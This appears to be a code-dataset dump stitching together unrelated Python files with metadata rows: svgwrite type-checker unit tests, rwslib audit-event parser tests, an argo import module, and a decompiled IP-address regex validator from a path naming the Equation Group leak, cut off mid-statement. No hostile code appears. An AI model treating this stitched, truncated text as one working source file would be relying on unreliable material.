self.assertTrue(self.checker.is_number('100000'))
self.assertTrue(self.checker.is_number('-100000'))
self.assertTrue(self.checker.is_number('3.141592'))
def test_is_not_number(self):
self.assertFalse(self.checker.is_number( (1,2) ))
self.assertFalse(self.checker.is_number('manfred'))
self.assertFalse(self.checker.is_number( dict(a=1, b=2) ))
def test_is_name(self):
self.assertTrue(self.checker.is_name('mozman-öäüß'))
self.assertTrue(self.checker.is_name('mozman:mozman'))
self.assertTrue(self.checker.is_name('mozman:mozman[2]'))
# not only strings allowed
self.assertTrue(self.checker.is_name(100))
self.assertTrue(self.checker.is_name(100.123))
def test_is_not_name(self):
self.assertFalse(self.checker.is_name(''))
self.assertFalse(self.checker.is_name('mozman,mozman[2]'))
self.assertFalse(self.checker.is_name('mozman mozman[2]'))
self.assertFalse(self.checker.is_name('mozman(mozman)[2]'))
# tuple and dict contains ',', '(', ')' or ' '
self.assertFalse(self.checker.is_name((100, 200)))
self.assertFalse(self.checker.is_name(dict(a=100, b=200)))
def test_is_length(self):
for value in [' 100px ', ' -100ex ', ' 100em ', ' -100pt ',
' 100pc ', ' 100mm', ' 100cm', ' 100in',
' 5%', 100, 3.1415, 700000, -500000, '100000',
'-4000000.45']:
self.assertTrue(self.checker.is_length(value))
def test_is_not_length(self):
for value in [' 100xpx ', ' -100km ', ' 100mi ', (1, 1),
dict(a=1, b=2), [1, 2], ' mozman ']:
self.assertFalse(self.checker.is_length(value))
def test_is_integer(self):
""" Integer also as String '100'. """
# big numbers only valid for full profile
self.assertTrue(self.checker.is_integer(100000))
self.assertTrue(self.checker.is_integer(-100000))
self.assertTrue(self.checker.is_integer('100000'))
self.assertTrue(self.checker.is_integer('-100000'))
def test_is_not_integer(self):
self.assertFalse(self.checker.is_integer( (1,2) ))
self.assertFalse(self.checker.is_integer('manfred'))
self.assertFalse(self.checker.is_integer( dict(a=1, b=2) ))
self.assertFalse(self.checker.is_integer(3.141592))
self.assertFalse(self.checker.is_integer('3.141592'))
def test_is_percentage(self):
self.assertTrue(self.checker.is_percentage(100))
self.assertTrue(self.checker.is_percentage(50.123))
self.assertTrue(self.checker.is_percentage(1000))
self.assertTrue(self.checker.is_percentage('100'))
self.assertTrue(self.checker.is_percentage('50.123'))
self.assertTrue(self.checker.is_percentage('1000'))
self.assertTrue(self.checker.is_percentage(' 100% '))
self.assertTrue(self.checker.is_percentage(' 50.123% '))
self.assertTrue(self.checker.is_percentage(' 1000% '))
def test_is_not_percentage(self):
self.assertFalse(self.checker.is_percentage('100px'))
self.assertFalse(self.checker.is_percentage('100cm'))
self.assertFalse(self.checker.is_percentage(' mozman '))
self.assertFalse(self.checker.is_percentage( (1, 2) ))
self.assertFalse(self.checker.is_percentage( dict(a=1, b=2) ))
def test_is_time(self):
self.assertTrue(self.checker.is_time(100))
self.assertTrue(self.checker.is_time(50.123))
self.assertTrue(self.checker.is_time(1000))
self.assertTrue(self.checker.is_time(' 100 '))
self.assertTrue(self.checker.is_time(' 50.123 '))
self.assertTrue(self.checker.is_time(' 1000 '))
self.assertTrue(self.checker.is_time(' 100ms'))
self.assertTrue(self.checker.is_time(' 50.123s'))
self.assertTrue(self.checker.is_time(' 1000ms'))
def test_is_not_time(self):
self.assertFalse(self.checker.is_time('100px'))
self.assertFalse(self.checker.is_time('100cm'))
self.assertFalse(self.checker.is_time(' mozman '))
self.assertFalse(self.checker.is_time( (1, 2) ))
self.assertFalse(self.checker.is_time( dict(a=1, b=2) ))
def test_is_angle(self):
self.assertTrue(self.checker.is_angle(100))
self.assertTrue(self.checker.is_angle(50.123))
self.assertTrue(self.checker.is_angle(1000))
self.assertTrue(self.checker.is_angle(' 100 '))
self.assertTrue(self.checker.is_angle(' 50.123 '))
self.assertTrue(self.checker.is_angle(' 1000 '))
self.assertTrue(self.checker.is_angle(' 100rad'))
self.assertTrue(self.checker.is_angle(' 50.123grad'))
self.assertTrue(self.checker.is_angle(' 1000deg'))
def test_is_not_angle(self):
self.assertFalse(self.checker.is_angle('100px'))
self.assertFalse(self.checker.is_angle('100cm'))
self.assertFalse(self.checker.is_angle(' mozman '))
self.assertFalse(self.checker.is_angle( (1, 2) ))
self.assertFalse(self.checker.is_angle( dict(a=1, b=2) ))
def test_is_frequency(self):
self.assertTrue(self.checker.is_frequency(100))
self.assertTrue(self.checker.is_frequency(50.123))
self.assertTrue(self.checker.is_frequency(1000))
self.assertTrue(self.checker.is_frequency(' 100 '))
self.assertTrue(self.checker.is_frequency(' 50.123 '))
self.assertTrue(self.checker.is_frequency(' 1000 '))
self.assertTrue(self.checker.is_frequency(' 100Hz'))
self.assertTrue(self.checker.is_frequency(' 50.123kHz'))
self.assertTrue(self.checker.is_frequency(' 1000Hz'))
def test_is_not_frequency(self):
self.assertFalse(self.checker.is_frequency('100px'))
self.assertFalse(self.checker.is_frequency('100cm'))
self.assertFalse(self.checker.is_frequency(' mozman '))
self.assertFalse(self.checker.is_frequency( (1, 2) ))
self.assertFalse(self.checker.is_frequency( dict(a=1, b=2) ))
def test_is_shape(self):
self.assertTrue(self.checker.is_shape(' rect(1, 2, 3, 4)'))
self.assertTrue(self.checker.is_shape(' rect(1cm, 2mm, -3px, 4%)'))
def test_is_not_shape(self):
self.assertFalse(self.checker.is_shape('rect(1, 2, 3)'))
self.assertFalse(self.checker.is_shape('rect(1, 2, 3, 4, 5)'))
self.assertFalse(self.checker.is_shape('rect(1, 2, 3, m)'))
def test_is_number_optional_number(self):
self.assertTrue(self.checker.is_number_optional_number(' 1, 2'))
self.assertTrue(self.checker.is_number_optional_number('1 2. '))
self.assertTrue(self.checker.is_number_optional_number('1 '))
self.assertTrue(self.checker.is_number_optional_number(' 1.5 '))
self.assertTrue(self.checker.is_number_optional_number( 1 ))
self.assertTrue(self.checker.is_number_optional_number( [1, 2] ))
def test_is_not_number_optional_number(self):
self.assertFalse(self.checker.is_number_optional_number(' 1px, 2'))
self.assertFalse(self.checker.is_number_optional_number(''))
self.assertFalse(self.checker.is_number_optional_number(' , 2'))
self.assertFalse(self.checker.is_number_optional_number(' 1 , 2 , 3'))
self.assertFalse(self.checker.is_number_optional_number(' 1. 2. 3.'))
self.assertFalse(self.checker.is_number_optional_number(' 1 2 3'))
self.assertFalse(self.checker.is_number_optional_number([]))
self.assertFalse(self.checker.is_number_optional_number([1,2,3]))
self.assertFalse(self.checker.is_number_optional_number([1, '1px']))
def test_is_IRI(self):
# every none empty string is valid - no real url validation is done
self.assertTrue(self.checker.is_IRI("http://localhost:8080?a=12"))
self.assertTrue(self.checker.is_IRI("%&/(/&%$"))
def test_is_not_IRI(self):
self.assertFalse(self.checker.is_IRI(""))
self.assertFalse(self.checker.is_IRI(1))
self.assertFalse(self.checker.is_IRI(3.1415))
self.assertFalse(self.checker.is_IRI( (1, 0)))
self.assertFalse(self.checker.is_IRI(dict(a=1)))
def test_is_FuncIRI(self):
self.assertTrue(self.checker.is_FuncIRI("url(http://localhost:8080?a=12)"))
self.assertTrue(self.checker.is_FuncIRI("url(ftp://something/234)"))
def test_is_not_FuncIRI(self):
self.assertFalse(self.checker.is_FuncIRI("url()"))
self.assertFalse(self.checker.is_FuncIRI("url"))
self.assertFalse(self.checker.is_FuncIRI("url("))
self.assertFalse(self.checker.is_FuncIRI("url(http://localhost:8080"))
self.assertFalse(self.checker.is_FuncIRI("http://localhost:8080"))
def test_is_semicolon_list(self):
self.assertTrue(self.checker.is_semicolon_list("1;2;3;4;5"))
self.assertTrue(self.checker.is_semicolon_list("1;2,3;4,5"))
self.assertTrue(self.checker.is_semicolon_list("1.;2.,3.;4.,5."))
self.assertTrue(self.checker.is_semicolon_list("1"))
self.assertTrue(self.checker.is_semicolon_list("1 2;3;4;5"))
def test_is_not_semicolon_list(self):
# only numbers!
self.assertFalse(self.checker.is_semicolon_list("1 A;3 4;5,Z"))
self.assertFalse(self.checker.is_semicolon_list(""))
def test_is_icc_color(self):
self.assertTrue(self.checker.is_icccolor("icc-color(red)"))
self.assertTrue(self.checker.is_icccolor("icc-color(red mozman)"))
self.assertTrue(self.checker.is_icccolor("icc-color(red,mozman)"))
self.assertTrue(self.checker.is_icccolor("icc-color(red,mozman 123)"))
def test_is_not_icc_color(self):
self.assertFalse(self.checker.is_icccolor("icc-color()"))
self.assertFalse(self.checker.is_icccolor("icc-color((a))"))
def test_is_hex_color(self):
self.assertTrue(self.checker.is_color("#101010"))
self.assertTrue(self.checker.is_color("#111"))
self.assertTrue(self.checker.is_color("#FFFFFF"))
self.assertTrue(self.checker.is_color("#FFF"))
self.assertTrue(self.checker.is_color("#aaaaaa"))
self.assertTrue(self.checker.is_color("#aaa"))
def test_is_not_hex_color(self):
self.assertFalse(self.checker.is_color("#1"))
self.assertFalse(self.checker.is_color("#22"))
self.assertFalse(self.checker.is_color("#4444"))
self.assertFalse(self.checker.is_color("#55555"))
self.assertFalse(self.checker.is_color("#7777777"))
self.assertFalse(self.checker.is_color("#gghhii"))
def test_is_rgb_int_color(self):
self.assertTrue(self.checker.is_color("rgb(1,2,3)"))
self.assertTrue(self.checker.is_color("rgb( 1, 2, 3 )"))
self.assertTrue(self.checker.is_color("rgb( 11, 21, 31 )"))
self.assertTrue(self.checker.is_color("rgb( 0, 0, 0 )"))
self.assertTrue(self.checker.is_color("rgb( 255 , 255 , 255 )"))
def test_is_not_rgb_int_color(self):
self.assertFalse(self.checker.is_color("rgb(,2,3)"))
self.assertFalse(self.checker.is_color("rgb(1,,3)"))
self.assertFalse(self.checker.is_color("rgb(1,2)"))
self.assertFalse(self.checker.is_color("rgb(1)"))
self.assertFalse(self.checker.is_color("rgb(a,2,3)"))
self.assertFalse(self.checker.is_color("rgb()"))
def test_is_rgb_percentage_color(self):
self.assertTrue(self.checker.is_color("rgb(1%,2%,3%)"))
self.assertTrue(self.checker.is_color("rgb( 1%, 2%, 3% )"))
self.assertTrue(self.checker.is_color("rgb( 11%, 21%, 31% )"))
self.assertTrue(self.checker.is_color("rgb( 0%, 0%, 0% )"))
# this is not really valid
self.assertTrue(self.checker.is_color("rgb( 255% , 255% , 255% )"))
def test_is_not_rgb_percentage_color(self):
self.assertFalse(self.checker.is_color("rgb()"))
self.assertFalse(self.checker.is_color("rgb(1,2%,3%)"))
self.assertFalse(self.checker.is_color("rgb(,2%,3%)"))
self.assertFalse(self.checker.is_color("rgb(,,)"))
self.assertFalse(self.checker.is_color("rgb(a%,b%,c%)"))
# no decimal points
self.assertFalse(self.checker.is_color("rgb(1.0%, 2.0%, 3.0%)"))
def test_is_color_name(self):
self.assertTrue(self.checker.is_color("blue"))
def test_is_not_color_name(self):
self.assertFalse(self.checker.is_color("blau"))
def test_is_paint_with_funcIRI(self):
self.assertTrue(self.checker.is_paint("rgb(10, 20, 30)"))
def test_is_paint_with_funcIRI_2(self):
self.assertTrue(self.checker.is_paint("rgb(10, 20, 30) none"))
def test_is_paint_with_funcIRI_3(self):
self.assertTrue(self.checker.is_paint("url(localhost) rgb(10, 20, 30)"))
def test_is_paint(self):
self.assertTrue(self.checker.is_paint("inherit"))
self.assertTrue(self.checker.is_paint("none"))
self.assertTrue(self.checker.is_paint("currentColor"))
self.assertTrue(self.checker.is_paint("rgb(10,20,30)"))
self.assertTrue(self.checker.is_paint("rgb(10%,20%,30%)"))
self.assertTrue(self.checker.is_paint("url(localhost)"))
self.assertTrue(self.checker.is_paint("red"))
def test_is_not_paint(self):
self.assertFalse(self.checker.is_paint("(123)"))
self.assertFalse(self.checker.is_paint("123"))
self.assertFalse(self.checker.is_paint("schwarz"))
def test_is_XML_name(self):
self.assertTrue(self.checker.is_XML_Name("Name:xml123"))
self.assertTrue(self.checker.is_XML_Name("Name-xml123"))
self.assertTrue(self.checker.is_XML_Name("Name.xml123"))
def test_is_not_XML_name(self):
self.assertFalse(self.checker.is_XML_Name("Name xml123"))
self.assertFalse(self.checker.is_XML_Name("0Name:xml123"))
self.assertFalse(self.checker.is_XML_Name(".Name:xml123"))
def test_is_transform_list(self):
self.assertTrue(self.checker.is_transform_list("translate(10,10)"))
self.assertTrue(self.checker.is_transform_list("scale(2 2)"))
self.assertTrue(self.checker.is_transform_list("rotate( 30 )"))
self.assertTrue(self.checker.is_transform_list("skewX(15)"))
self.assertTrue(self.checker.is_transform_list("skewY(-15)"))
self.assertTrue(self.checker.is_transform_list("matrix(.1 .2 .3 .4 .5 .6)"))
self.assertTrue(self.checker.is_transform_list("translate(10,10), rotate( 30 )"))
self.assertTrue(self.checker.is_transform_list("translate(10,10) , rotate( 30 )"))
self.assertTrue(self.checker.is_transform_list("translate(10,10) , rotate( 30 )"))
self.assertTrue(self.checker.is_transform_list("translate(10,10) rotate( 30 )"))
def test_is_not_transform_list(self):
self.assertFalse(self.checker.is_transform_list("mozman(10,10)"))
self.assertFalse(self.checker.is_transform_list("translate(10,10"))
self.assertFalse(self.checker.is_transform_list("translate 10, 10"))
self.assertFalse(self.checker.is_transform_list("translate(10, 10))"))
self.assertFalse(self.checker.is_transform_list("translate((10, 10))"))
def test_is_not_transform_list_invalid_separator(self):
self.assertFalse(self.checker.is_transform_list("translate(10,10) ,, rotate( 30 )"))
self.assertFalse(self.checker.is_transform_list("translate(10,10) x rotate( 30 )"))
def test_is_four_numbers(self):
self.assertTrue(self.checker.is_four_numbers(' 1, 2, 3, 4 '))
self.assertTrue(self.checker.is_four_numbers(' 1 2 3 4 '))
self.assertTrue(self.checker.is_four_numbers((1,2,3,4)))
def test_is_not_four_numbers(self):
self.assertFalse(self.checker.is_four_numbers(' 1, 2, 3, '))
self.assertFalse(self.checker.is_four_numbers(' 1, 2 '))
self.assertFalse(self.checker.is_four_numbers(' 1 '))
self.assertFalse(self.checker.is_four_numbers((1,2,3)))
def test_is_shape(self):
self.assertTrue(self.checker.is_shape("rect(1,2,3,4)"))
self.assertTrue(self.checker.is_shape("rect(1px,2px,-3px,-4px)"))
self.assertTrue(self.checker.is_shape("rect( 1px , 2px , -3px , -4px )"))
self.assertTrue(self.checker.is_shape("rect(auto,auto,auto,auto)"))
self.assertTrue(self.checker.is_shape("rect( auto , auto , auto , auto )"))
if __name__=='__main__' :
unittest.main()
| 52.254286 | 93 | 0.658483 | 2,466 | 18,289 | 4.695053 | 0.083536 | 0.216618 | 0.253757 | 0.278546 | 0.880463 | 0.85887 | 0.713422 | 0.634134 | 0.542149 | 0.516151 | 0 | 0.053881 | 0.187162 | 18,289 | 349 | 94 | 52.404011 | 0.724943 | 0.031166 | 0 | 0.085324 | 0 | 0 | 0.122151 | 0.005366 | 0 | 0 | 0 | 0 | 0.774744 | 1 | 0.180887 | false | 0 | 0.010239 | 0 | 0.194539 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
17b83359fd181c0a8ff76d740f2b336af9e5f13b | 9,373 | py | Python | rwslib/tests/test_audit_event.py | mdsol/rwslib | 799cbc2ca75dc1be3cb4099bf26b7a5cc360fbfd | [
"MIT"
] | 20 | 2015-05-21T17:07:20.000Z | 2021-12-09T02:46:16.000Z | rwslib/tests/test_audit_event.py | mdsol/rwslib | 799cbc2ca75dc1be3cb4099bf26b7a5cc360fbfd | [
"MIT"
] | 83 | 2015-01-09T08:48:21.000Z | 2022-03-28T11:09:34.000Z | rwslib/tests/test_audit_event.py | mdsol/rwslib | 799cbc2ca75dc1be3cb4099bf26b7a5cc360fbfd | [
"MIT"
] | 20 | 2015-05-21T17:07:29.000Z | 2021-05-12T11:59:58.000Z | from rwslib.extras.audit_event import parser
import unittest
import os
class MockEventer:
"""
Mock Event Sink instance for the purposes of testing (capturing all ASC)
"""
def __init__(self):
self.__events = {}
def default(self, event):
self.__events.setdefault(event.subcategory, []).append(event)
def get_audit_subcategory_events(self, audit_subcategory):
return self.__events[audit_subcategory]
@property
def eventlist(self):
return self.__events.keys()
class MockEventerEntered:
"""
Mock Event Sink instance for the purposes of testing (capturing only 'Entered' ASC)
"""
def __init__(self):
self.__events = {}
def get_audit_subcategory_events(self, audit_subcategory):
return self.__events.get(audit_subcategory, [])
def Entered(self, event):
self.__events.setdefault(event.subcategory, []).append(event)
@property
def eventlist(self):
return self.__events.keys()
class TestAuditEvent(unittest.TestCase):
"""
Test Case for Audit Event Processor
"""
def test_parses_audit_message(self):
"""parses an audit message from a CAR message"""
with open(
os.path.join(os.path.dirname(__file__), "fixtures", "car_message.xml")
) as fh:
content = fh.read()
eventer = MockEventer()
message = parser.parse(content, eventer)
# get the events
self.assertTrue(len(eventer.eventlist) > 1)
self.assertTrue("EnteredEmpty" in eventer.eventlist)
self.assertEquals(60, len(eventer.get_audit_subcategory_events("EnteredEmpty")))
self.assertEquals(501, len(eventer.get_audit_subcategory_events("Entered")))
def test_parses_audit_message_entered(self):
"""parses an audit message, but only subscribe to Entered Events from a CAR message"""
with open(
os.path.join(os.path.dirname(__file__), "fixtures", "car_message.xml")
) as fh:
content = fh.read()
eventer = MockEventerEntered()
message = parser.parse(content, eventer)
# get the events
self.assertTrue(len(eventer.eventlist) == 1)
self.assertTrue("EnteredEmpty" not in eventer.eventlist)
self.assertEquals(0, len(eventer.get_audit_subcategory_events("EnteredEmpty")))
self.assertEquals(501, len(eventer.get_audit_subcategory_events("Entered")))
def test_parses_audit_message_subject_created(self):
"""parses an audit message, but only subscribe to Entered Events from a CAR message"""
with open(
os.path.join(os.path.dirname(__file__), "fixtures", "car_message.xml")
) as fh:
content = fh.read()
eventer = MockEventer()
message = parser.parse(content, eventer)
# get the events
self.assertEquals(
92, len(eventer.get_audit_subcategory_events("SubjectCreated"))
)
subject_123_ABC = eventer.get_audit_subcategory_events("SubjectCreated")[0]
self.assertEqual(
"e983f330-c108-45ab-8f16-b4a566c7089c", subject_123_ABC.subject.key
)
self.assertEqual("123 ABC", subject_123_ABC.subject.name)
def test_parses_specify_value(self):
"""Extracts a specified value from a CAR message"""
content = """<ODM ODMVersion="1.3" FileType="Transactional" FileOID="552a8cac-7c4e-4ba5-9f71-a20b90865531" CreationDateTime="2021-06-02T10:21:02" xmlns="http://www.cdisc.org/ns/odm/v1.3" xmlns:mdsol="http://www.mdsol.com/ns/odm/metadata">
<ClinicalData StudyOID="Mediflex" MetaDataVersionOID="16" mdsol:AuditSubCategoryName="Entered">
<SubjectData SubjectKey="e983f330-c108-45ab-8f16-b4a566c7089c" mdsol:SubjectKeyType="SubjectUUID" mdsol:SubjectName="123 ABC" >
<SiteRef LocationOID="MDSOL" />
<StudyEventData StudyEventOID="SCREEN" StudyEventRepeatKey="SCREEN[1]" mdsol:InstanceId="50" >
<FormData FormOID="DM" FormRepeatKey="1" mdsol:DataPageId="179" >
<ItemGroupData ItemGroupOID="DM" mdsol:RecordId="251" >
<ItemData ItemOID="DM.SEX" TransactionType="Upsert" Value="Specify" mdsol:SpecifyValue="UNDEF" >
<AuditRecord>
<UserRef UserOID="pvummudi"/>
<LocationRef LocationOID="MDSOL" />
<DateTimeStamp>2008-12-04T16:59:07</DateTimeStamp>
<ReasonForChange></ReasonForChange>
<SourceID>3284</SourceID>
</AuditRecord>
</ItemData>
</ItemGroupData>
</FormData>
</StudyEventData>
</SubjectData>
</ClinicalData>
</ODM>
"""
eventer = MockEventer()
message = parser.parse(content, eventer)
event = eventer.get_audit_subcategory_events("Entered")[0]
self.assertEqual("UNDEF", event.item.specify_value)
self.assertEqual("Specify", event.item.value)
self.assertEqual("DM.SEX", event.item.oid)
def test_parses_signature_broken(self):
"""mdsol:SignatureBroken parsing for case when broken from a CAR message"""
content = """<ODM ODMVersion="1.3" FileType="Transactional" FileOID="552a8cac-7c4e-4ba5-9f71-a20b90865531" CreationDateTime="2021-06-02T10:21:02" xmlns="http://www.cdisc.org/ns/odm/v1.3" xmlns:mdsol="http://www.mdsol.com/ns/odm/metadata">
<ClinicalData StudyOID="Mediflex" MetaDataVersionOID="16" mdsol:AuditSubCategoryName="Entered">
<SubjectData SubjectKey="e983f330-c108-45ab-8f16-b4a566c7089c" mdsol:SubjectKeyType="SubjectUUID" mdsol:SubjectName="123 ABC" >
<SiteRef LocationOID="MDSOL" />
<StudyEventData StudyEventOID="SCREEN" StudyEventRepeatKey="SCREEN[1]" mdsol:InstanceId="50" >
<FormData FormOID="DM" FormRepeatKey="1" mdsol:DataPageId="179" >
<ItemGroupData ItemGroupOID="DM" mdsol:RecordId="251" >
<ItemData ItemOID="DM.SEX" TransactionType="Upsert" Value="Specify" mdsol:SpecifyValue="UNDEF" mdsol:SignatureBroken="Yes" >
<AuditRecord>
<UserRef UserOID="pvummudi"/>
<LocationRef LocationOID="MDSOL" />
<DateTimeStamp>2008-12-04T16:59:07</DateTimeStamp>
<ReasonForChange></ReasonForChange>
<SourceID>3284</SourceID>
</AuditRecord>
</ItemData>
</ItemGroupData>
</FormData>
</StudyEventData>
</SubjectData>
</ClinicalData>
</ODM>
"""
eventer = MockEventer()
message = parser.parse(content, eventer)
event = eventer.get_audit_subcategory_events("Entered")[0]
self.assertEqual("UNDEF", event.item.specify_value)
self.assertEqual("Specify", event.item.value)
self.assertEqual("DM.SEX", event.item.oid)
self.assertTrue(event.item.signature_broken)
def test_parses_signature_not_broken(self):
"""mdsol:SignatureBroken parsing for case when not broken from a CAR message"""
content = """<ODM ODMVersion="1.3" FileType="Transactional" FileOID="552a8cac-7c4e-4ba5-9f71-a20b90865531" CreationDateTime="2021-06-02T10:21:02" xmlns="http://www.cdisc.org/ns/odm/v1.3" xmlns:mdsol="http://www.mdsol.com/ns/odm/metadata">
<ClinicalData StudyOID="Mediflex" MetaDataVersionOID="16" mdsol:AuditSubCategoryName="Entered">
<SubjectData SubjectKey="e983f330-c108-45ab-8f16-b4a566c7089c" mdsol:SubjectKeyType="SubjectUUID" mdsol:SubjectName="123 ABC" >
<SiteRef LocationOID="MDSOL" />
<StudyEventData StudyEventOID="SCREEN" StudyEventRepeatKey="SCREEN[1]" mdsol:InstanceId="50" >
<FormData FormOID="DM" FormRepeatKey="1" mdsol:DataPageId="179" >
<ItemGroupData ItemGroupOID="DM" mdsol:RecordId="251" >
<ItemData ItemOID="DM.SEX" TransactionType="Upsert" Value="Specify" mdsol:SpecifyValue="UNDEF" mdsol:SignatureBroken="No" >
<AuditRecord>
<UserRef UserOID="pvummudi"/>
<LocationRef LocationOID="MDSOL" />
<DateTimeStamp>2008-12-04T16:59:07</DateTimeStamp>
<ReasonForChange></ReasonForChange>
<SourceID>3284</SourceID>
</AuditRecord>
</ItemData>
</ItemGroupData>
</FormData>
</StudyEventData>
</SubjectData>
</ClinicalData>
</ODM>
"""
eventer = MockEventer()
message = parser.parse(content, eventer)
event = eventer.get_audit_subcategory_events("Entered")[0]
self.assertEqual("UNDEF", event.item.specify_value)
self.assertEqual("Specify", event.item.value)
self.assertEqual("DM.SEX", event.item.oid)
self.assertFalse(event.item.signature_broken)
| 48.817708 | 246 | 0.611971 | 914 | 9,373 | 6.155361 | 0.196937 | 0.042659 | 0.040526 | 0.04888 | 0.901884 | 0.8754 | 0.858514 | 0.849449 | 0.832385 | 0.795059 | 0 | 0.048691 | 0.270351 | 9,373 | 191 | 247 | 49.073298 | 0.773944 | 0.067534 | 0 | 0.764706 | 0 | 0.058824 | 0.56841 | 0.193511 | 0 | 0 | 0 | 0 | 0.143791 | 1 | 0.091503 | false | 0 | 0.019608 | 0.026144 | 0.156863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
17e29c6bdfcac864581921c09b45cd98d3d6d96e | 200 | py | Python | argo_workflow_tools/dsl/node_properties/__init__.py | shanioren/argo-workflow-tools | d2fb41de3f5ccf9284ff4cb027a886ff61a13e69 | [
"Apache-2.0"
] | 15 | 2021-12-08T20:57:52.000Z | 2022-03-23T19:41:29.000Z | argo_workflow_tools/dsl/node_properties/__init__.py | shanioren/argo-workflow-tools | d2fb41de3f5ccf9284ff4cb027a886ff61a13e69 | [
"Apache-2.0"
] | 18 | 2021-12-07T07:49:17.000Z | 2022-03-02T10:27:49.000Z | argo_workflow_tools/dsl/node_properties/__init__.py | shanioren/argo-workflow-tools | d2fb41de3f5ccf9284ff4cb027a886ff61a13e69 | [
"Apache-2.0"
] | 3 | 2022-01-09T08:19:11.000Z | 2022-02-09T15:20:08.000Z | from argo_workflow_tools.dsl.node_properties.dag_node_properties import (
DAGNodeProperties,
)
from argo_workflow_tools.dsl.node_properties.task_node_properties import (
TaskNodeProperties,
)
| 28.571429 | 74 | 0.84 | 24 | 200 | 6.583333 | 0.5 | 0.35443 | 0.202532 | 0.265823 | 0.481013 | 0.481013 | 0.481013 | 0 | 0 | 0 | 0 | 0 | 0.1 | 200 | 6 | 75 | 33.333333 | 0.877778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
aa367c1af889cf78d6b90ef4decf5486695b4aed | 2,423 | py | Python | Leak #5 - Lost In Translation/windows/Resources/Pc/PyScripts/Lib/pc/__init__.py | bidhata/EquationGroupLeaks | 1ff4bc115cb2bd5bf2ed6bf769af44392926830c | [
"Unlicense"
] | 9 | 2019-11-22T04:58:40.000Z | 2022-02-26T16:47:28.000Z | Leak #5 - Lost In Translation/windows/Resources/Pc/PyScripts/Lib/pc/__init__.py | bidhata/EquationGroupLeaks | 1ff4bc115cb2bd5bf2ed6bf769af44392926830c | [
"Unlicense"
] | null | null | null | Leak #5 - Lost In Translation/windows/Resources/Pc/PyScripts/Lib/pc/__init__.py | bidhata/EquationGroupLeaks | 1ff4bc115cb2bd5bf2ed6bf769af44392926830c | [
"Unlicense"
] | 8 | 2017-09-27T10:31:18.000Z | 2022-01-08T10:30:46.000Z | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
# Compiled at: 2012-04-27 21:25:42
def IsValidIpAddress(addr):
import re
if re.match('^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$', addr) != None or re.match('^([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$', addr) != None or re.match('^::$', addr) != None or re.match('^::([a-fA-F0-9]){1,4}(:([a-f]|[A-F]|[0-9]){1,4}){0,6}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,5}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::([a-fA-F0-9]){1,4}:([a-fA-F0-9]){1,4}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,5}::([a-fA-F0-9]){1,4}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,6}::$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){5}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$', addr) != None or re.match('^::([0-9]){1,3}(\\.[0-9]{1,3}){3}$', addr) != None or re.match('^::([a-fA-F0-9]){1,4}(:)([0-9]){1,3}(\\.[0-9]{1,3}){3}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}::([a-fA-F0-9]){1,4}(:[a-fA-F0-9]){0,2}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}::([a-fA-F0-9]){1,4}(:[a-fA-F0-9]){0,1}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}::([a-fA-F0-9]){1,4}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$', addr) != None or re.match('^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::[0-9]{1,3}(\\.[0-9]{1,3}){3}$', addr) != None:
